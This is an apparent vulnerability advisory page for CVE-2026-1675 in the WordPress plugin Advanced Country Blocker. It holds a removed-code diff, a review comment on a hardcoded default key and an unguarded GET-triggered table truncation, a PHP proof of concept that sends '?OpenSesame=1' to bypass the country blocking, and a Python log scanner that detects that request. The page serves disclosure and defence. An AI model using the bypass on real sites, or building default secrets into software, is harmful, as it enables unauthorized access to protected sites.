-							echo '<a' . wp_kses_post($class) . ' href="' . esc_url( add_query_arg( array( 'page' => 'advcb_block_logs', 'paged' => $i ) ) ) . '">' . esc_html( $i ) . '</a> ';
-						}
-
-						// Optionally, add a "Next" button.
-						if ( $paged < $total_pages ) {
-							echo '<a class="button" href="' . esc_url( add_query_arg( array( 'page' => 'advcb_block_logs', 'paged' => $paged + 1 ) ) ) . '">Next »</a>';
-						}
-						?>
-                    </div>
-                </div>
-			<?php endif; ?>
-		<?php else : ?>
-            <p>No blocked attempts logged yet.</p>
-		<?php endif; ?>
-    </div>
-	<?php
-}
-
-
-/**
- * REAL-TIME ACTIVITY MONITOR
- */
-
-/**
- * Track visitor for real-time monitoring.
- * Runs on every page load to update visitor activity.
- */
-function advcb_track_visitor_activity() {
-	// Don't track admin users in the monitor (optional).
-	if ( current_user_can( 'manage_options' ) ) {
-		return;
-	}
-
-	$ip = advcb_get_visitor_ip();
-
-	if ( 'unknown' === $ip ) {
-		return;
-	}
-
-	// Get existing activity data.
-	$activity = get_transient( 'advcb_live_activity' );
-	if ( ! is_array( $activity ) ) {
-		$activity = array(
-			'visitors'   => array(),
-			'blocks'     => array(),
-			'statistics' => array(
-				'today_visitors' => 0,
-				'today_blocks'   => 0,
-				'active_now'     => 0,
-			),
-		);
-	}
-
-	$current_time = current_time( 'mysql' );
-	$timestamp = time();
-
-	// Update or add visitor.
-	$found = false;
-	foreach ( $activity['visitors'] as &$visitor ) {
-		if ( $visitor['ip'] === $ip ) {
-			$visitor['last_seen'] = $current_time;
-			$visitor['timestamp'] = $timestamp;
-			$visitor['requests']++;
-			$found = true;
-			break;
-		}
-	}
-	unset( $visitor );
-
-	if ( ! $found ) {
-		// Get visitor country.
-		$country_code = advcb_get_country_code_for_ip( $ip );
-		$country_name = advcb_get_country_name( $country
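Review bot: the removed settings renderer carries the known default in three places beyond the activation routine: `$current_secret_key = get_option( 'advcb_secret_key', 'OpenSesame' )`, the `placeholder="OpenSesame"` on the `advcb_secret_key` input, and the preview script's `$(this).val() || 'OpenSesame'`. Whatever replaces this function should drop all three, since a site whose option row is missing would still be shown the published value as its key and an emptied field previews it; rejecting an empty key on save is cleaner than any fallback. Separately, in `advcb_block_logs_page()` the `truncate_logs` branch passes `$_GET['_wpnonce']` to `wp_verify_nonce()` without unslashing or sanitizing it and runs `TRUNCATE TABLE` from a GET request with no `current_user_can()` check visible in the function; a capability check before the query and a POST action would be the safer shape.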

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1675 - Advanced Country Blocker <= 2.3.1 - Unauthenticated Authorization Bypass via Insecure Default Secret Key

/**
 * Proof of Concept for CVE-2026-1675
 * Demonstrates authorization bypass in Advanced Country Blocker plugin
 * Usage: php poc.php http://vulnerable-site.com
 */

$target_url = isset($argv[1]) ? $argv[1] : 'http://localhost/wordpress';
$default_key = 'OpenSesame'; // Hardcoded default secret key

// Test the default bypass key
function test_bypass($url, $key) {
    $test_url = $url . '?' . $key . '=1';
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $test_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_USERAGENT, 'Atomic-Edge-PoC/1.0');
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return array('code' => $http_code, 'url' => $test_url);
}

// Attempt bypass with default key
echo "[*] Testing Advanced Country Blocker bypass on: $target_url\n";
echo "[*] Using default secret key: $default_key\n";

$result = test_bypass($target_url, $default_key);

echo "[*] Request URL: " . $result['url'] . "\n";
echo "[*] HTTP Response Code: " . $result['code'] . "\n";

// Analyze results
if ($result['code'] == 200) {
    echo "[+] SUCCESS: Authorization bypass successful. Plugin blocking circumvented.\n";
    echo "[+] The site is vulnerable to CVE-2026-1675.\n";
} elseif ($result['code'] == 403) {
    echo "[-] FAILED: Received 403 Forbidden. Possible scenarios:\n";
    echo "    - Plugin not installed/activated\n";
    echo "    - Administrator changed the default secret key\n";
    echo "    - IP address is blacklisted\n";
} else {
    echo "[?] UNKNOWN: Received HTTP " . $result['code'] . ". Manual verification required.\n";
}

// Note: This PoC only tests the default key.
// Administrators who changed the key are not vulnerable.
echo "\n[!] Note: This vulnerability only affects installations where\n";
echo "    administrators did not change the default 'advcb_secret_key' option.\n";
?>
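
For the defender's side of the request the PoC sends, this added example (not code from Atomic Edge or the plugin) scans combined-format access logs for requests carrying the default key as `OpenSesame=1` and counts each client's follow-up requests inside the one-hour whitelist window. The function names, the log format and the sample lines are constructed for illustration, and the window is assumed to run from the client's latest use of the key.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qsl

DEFAULT_KEY = "OpenSesame"          # default advcb_secret_key in <= 2.3.1
BYPASS_WINDOW = timedelta(hours=1)  # assumed: HOUR_IN_SECONDS from last key use

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3}'
)

def uses_default_key(target):
    """True if the request carries OpenSesame=1 the way the plugin tests $_GET."""
    params = dict(parse_qsl(urlsplit(target).query, keep_blank_values=True))
    return params.get(DEFAULT_KEY) == "1"   # last duplicate wins, as in PHP

def find_bypass_activity(lines):
    """Return {ip: {first_use, uses, expires, followups}} for default-key use."""
    report = {}
    for line in lines:                       # lines assumed in time order
        m = LINE_RE.match(line)
        if not m:
            continue                         # skip lines in another format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip = m["ip"]
        if uses_default_key(m["target"]):
            entry = report.setdefault(ip, {"first_use": ts, "uses": 0, "followups": 0})
            entry["uses"] += 1
            entry["expires"] = ts + BYPASS_WINDOW
        elif ip in report and ts <= report[ip]["expires"]:
            report[ip]["followups"] += 1     # served while whitelisted
    return report

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2026:10:00:00 +0000] "GET /?OpenSesame=1 HTTP/1.1" 200 512 "-" "curl/8"',
    '203.0.113.7 - - [18/Mar/2026:10:05:00 +0000] "GET /wp-login.php HTTP/1.1" 200 2048 "-" "curl/8"',
    '203.0.113.7 - - [18/Mar/2026:11:30:00 +0000] "GET /about/ HTTP/1.1" 403 0 "-" "curl/8"',
    '198.51.100.9 - - [18/Mar/2026:10:10:00 +0000] "GET /?s=OpenSesame HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [18/Mar/2026:10:11:00 +0000] "GET /?OpenSesame=1&OpenSesame=0 HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [18/Mar/2026:10:12:00 +0000] "GET /shop/?page=2&Open%53esame=1 HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, info in find_bypass_activity(SAMPLE_LOG).items():
        print(ip, info["first_use"].isoformat(), info["uses"], info["followups"])
```

A hit in this report on a site running 2.3.1 or earlier means the key should be rotated and the plugin updated to 2.3.2; on installations where the key was already changed, the same requests are harmless noise.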
